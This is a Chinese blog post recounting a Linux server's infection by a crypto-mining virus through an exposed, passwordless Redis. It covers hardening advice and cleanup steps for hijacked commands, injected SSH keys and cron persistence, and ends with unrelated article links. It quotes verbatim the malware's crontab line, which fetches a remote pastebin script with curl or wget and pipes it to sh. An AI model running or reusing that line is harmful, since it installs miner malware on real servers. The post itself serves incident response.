中毒原因,redis bind 0.0.0.0 而且没有密码,和安全意识太薄弱。

所以,redis一定要设密码,改端口,不要用root用户启动,如果业务没有需要,不要bind 0.0.0.0!!!!!!!!!!!

这个病毒能都横向传播,不要以为在外网redis的端口不通就没有事情。只要内网里有机器感染了病毒,就可以继续感染。

病症:CPU被不明进程吃满。

该病毒主要是通过,crontab定时任务,向指定网站下载脚本,运行进行挖矿。

通过crontab -l 就能查看

*/15 * * * * (curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh
通过crontab -r 和crontab -e 是删除不掉的,因为本地有进程维护着这个定时任务。
而且,这个病毒还劫持了一些linux系统的命令,比如ps。
处理过程:
1.利用linux的iptables,对上方ip网段的进出口都封杀。这样能够治标,将CPU降下来。修改redis密码。
2.检查用户下的.ssh文件夹,删除不是自己的公钥。中毒的时候,有可能被写入了对方的公钥,使得别人不需要密码,直接登录ssh登录
3.利用默安科技的清理工具,进行清理。github地址:https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool
4.清理之后,linux的ps命令应该是正常了,通过ps -ef 找出kerberods的相关的进程树进行杀掉,注意,病毒可能变种,还需要具体问题具体分析。
5.病毒进程杀掉之后,应该可以修改crontab里的内容了。到这里了还不行,还需要检查/var/spool/cron/ , /var/spool/cron/crontabs/ 和 /etc/cron.d/ 下的用户文件,有可能也被写入了定时任务,然后配合linux的 anacron就有可能替换cron,从而还原crontab定时任务。
上面大概就是这次清理这个病毒的大致过程,搞了两天,终于将ps进程里的 (curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh 干掉了。现在还在继续观察着,,,,,,
血的教训,服务器安全意识还是要有啊。redis能不bind 0.0.0.0 就不bind , 同时一定要设密码,创建新的用户来启动redis,限制启动redis的用户登录权限。 PS:如果确定了病毒是通过定时任务来执行的,可以对定时任务进行跟踪,查看都执行了什么。
  strace -o output.txt -T -f -ff -tt -e trace=all -p 定时任务PID

记一次Linux服务器因redis漏洞的挖矿病毒入侵的更多相关文章

  1. linux服务器查看redis版本:

    linux服务器查看redis版本:redis-server-v

  2. 记一次Linux服务器上查杀木马经历

    开篇前言 Linux服务器一直给我们的印象是安全.稳定.可靠,性能卓越.由于一来Linux本身的安全机制,Linux上的病毒.木马较少,二则由于宣称Linux是最安全的操作系统,导致很多人对Linux ...

  3. Linux 服务器上Redis安装和配置

    1.下载安装redis 在Linux服务器上,命令行执行以下命令(cd ./usr local/src 一般源码放在这里(推荐源码安装)) wget http://download.redis.io/ ...

  4. 记一次linux服务器问题处理过程

    本周二的时候,涛哥找我,说明了一件事,在安装ganglia的时候,发生的一个问题. 在一台suse 10 sp1的服务器上,安装ganglia的一个依赖包,libconfuse.rpm,安装完成之后, ...

  5. 记一次linux服务器入侵应急响应

    近日接到客户求助,他们收到托管电信机房的信息,通知检测到他们的一台服务器有对外发送攻击流量的行为.希望我们能协助排查问题. 一.确认安全事件 情况紧急,首先要确认安全事件的真实性.经过和服务器运维人员 ...

  6. 记一次linux下安装redis, 设置redis服务, 及添加环境变量

    一. redis的安装 cd /opt                                                                                # ...

  7. Linux服务器部署redis常见问题处理

    redis开启和禁用登陆密码校验 1. 开启登陆密码校验 在redis-cli命令行工具中执行如下命令: config set requirepass yourpassword2. 禁用登陆密码校验 ...

  8. redis 带入的挖矿病毒 qW3xT.2 wnTKYg 解决方法

    最近我的阿里云ecs 老是收到 云盾态势感知系统检测到异常 top -c 后发现一个 疑似病毒  /tmp/qW3xT.2 看到网友们的解决方案 试过之后效果不错,可以用的 知道wnTKYg是什么鬼之 ...

  9. 服务器由于redis未授权漏洞被攻击

    昨天阿里云拦截到了一次异常登陆,改了密码后就没有管他, 今天阿里云给我发消息说我的服务器可能被黑客利用,存在恶意发包行为....... 不过我不打算只是单纯的重置系统,经过一系列的查找原因后,发现被攻 ...

随机推荐

  1. Codeforces 947F. Public Service 构造

    原文链接https://www.cnblogs.com/zhouzhendong/p/CF947F.html 近5K码量构造题,CF血腥残暴! 题解 这里先定义 $FT(k)$ 表示一个菊花树多 k ...

  2. laravel好文

    https://laravelacademy.org/post/8464.html   最佳实践 laravel代码的书写规范以及优化 https://laravelacademy.org/post/ ...

  3. 从浏览器多进程到JS单线程,JS运行机制最全面的一次梳理

    前言 来源:https://dailc.github.io/2018/01/21/js_singlethread_eventloop.html 见解有限,如有描述不当之处,请帮忙及时指出,如有错误,会 ...

  4. C# - 什么是事件绑定?

    今天在学习C#时碰到了一个新词:“绑定事件”,不知道是什么东西? 请各位C#前辈指点!!!

  5. # Do—Now——团队冲刺博客_总结篇

    Do-Now--团队冲刺博客_总结篇 目录 博客链接 作者 1. 第一篇(领航篇) @仇夏 2. 第二篇 @侯泽洋 3. 第三篇 @仇夏 4. 第四篇 @周亚杰 5. 第五篇 @唐才铭 6. 第六篇 ...

  6. React(三)JSX内置表达式

    (一)JSX是什么? React 使用 JSX 来替代常规的 JavaScript. JSX 是一个看起来很像 XML 的 JavaScript 语法扩展. 我们不需要一定使用 JSX,但它有以下优点 ...

  7. TextInputLayout 用法

    <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android=&quo ...

  8. ng 服务端渲染

    官网文档 教学视屏 ng-toolkit @ng-toolkit/universal 注意: 使用 npm和yarn安装项目依赖,不要使用cnpm ng add @ng-toolkit/univers ...

  9. python语法_文件操作

    牢记“”“能调用方法的一定是对象”“” 文件的操作流程, 1 建立文件(打开文件)open('filename','模式').read() [这一步其实就是创建对象] 2 通过句柄进行操作 3 关闭o ...

  10. F#周报2019年第15期

    新闻 Hedgehog新站点 Bolero 0.4发布,增加远程认证 FsToolkit.ErrorHandling与Cvdm.ErrorHandling合并了 F#里的3D图形编程与游戏开发 有趣的 ...